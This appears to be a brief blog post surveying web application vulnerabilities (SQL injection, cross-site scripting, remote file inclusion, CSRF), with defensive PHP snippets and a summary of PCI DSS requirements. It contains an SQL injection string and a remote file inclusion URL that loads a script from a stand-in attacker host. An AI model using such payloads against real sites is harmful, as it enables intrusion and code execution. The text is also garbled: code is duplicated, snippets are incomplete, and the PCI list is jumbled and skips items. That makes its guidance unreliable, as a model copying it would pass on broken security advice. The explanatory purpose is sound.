WEB APPLICATION VULNERABILITIES IN ALL LANGUAGES
PHP,JAVA,ASP,PYTHON,PERL ...
Web application vulnerabilities are typically the result of a
lack of input/output sanitization, which are often exploited to either
manipulate source code or gain unauthorized access.
Such vulnerabilities enable the use of different attack vectors,
including:
1.
$stmt =
$dbh->prepare("INSERT INTO Customers (CustomerName,Address,City)
VALUES (:nam, :add, :cit)");
$stmt->bindParam(':nam', $txtNam);
$stmt->bindParam(':add', $txtAdd);
$stmt->bindParam(':cit', $txtCit);
$stmt->execute();
VALUES (:nam, :add, :cit)");
$stmt->bindParam(':nam', $txtNam);
$stmt->bindParam(':add', $txtAdd);
$stmt->bindParam(':cit', $txtCit);
$stmt->execute();
OR
$name_bad = "' OR
1'";
$name_bad =
mysql_real_escape_string($name_bad);
- Cross-site Scripting (XSS) –
XSS is an injection attack targeting users in order to access accounts,
activate Trojans or modify page content. Stored XSS occurs when malicious
code is injected directly into an application. Reflected XSStakes place when
malicious script is reflected off of an application onto a user’s browser.
Input Validation
$x= htmlentities(post
data)
Echo $x;
- Remote File Inclusion –
A hacker uses this type of attack to remotely inject a file onto a web
application server. This can result in the execution of malicious scripts
or code within the application, as well as data theft or manipulation.
http://victimsite.com/index.php?page=http://hackersite.com/evilscript.txt
- Cross-site Request Forgery
(CSRF) – An attack that could result in an unsolicited
transfer of funds, changed passwords or data theft. It’s caused when a
malicious web application makes a user’s browser perform an unwanted
action in a site to which a user is logged on.
CSRF attacks can be performed over GET
or POST requests.
place it in the links of the
page -- which would look like this :
http://mysite.com/vote/30?token=AZERTYUHQNWGST
·
Web application security solutions and enforced security
procedures, such as PCI Data Security Standard (PCI DSS)
certification, should be deployed to avoid such threats.
· REQUIREMENTS:
Area 1 – Build
and Maintain a Secure Network
- – Install a
firewall to protect your environment.
- – Do not use
vendor default profiles or passwords.
Area 2 –
Maintain a Vulnerability Management Program
- – Use and regularly
update anti-virus software.
- – Develop and
maintain secure systems and applications.
Area 4
– Assign a unique ID to each person with computer access.
- Area 5 –
Regularly Monitor and Test Networks.
- Requirement 10
– Track and monitor/log all access to network resources and cardholder
data.
- Requirement 11
– Regularly test security systems and processes.
- Area 6 –
Maintain an Information Security Policy.
- Requirement 12
– Maintain a policy that addresses information security.
ALL THESE PARAMETERS MUST BE IMPLEMENTED IF YOU ARE LAUNCHING A WEBSITE OR NEED TO DO AUDIT OF YOUR WEBSITE
Post a Comment
0Comments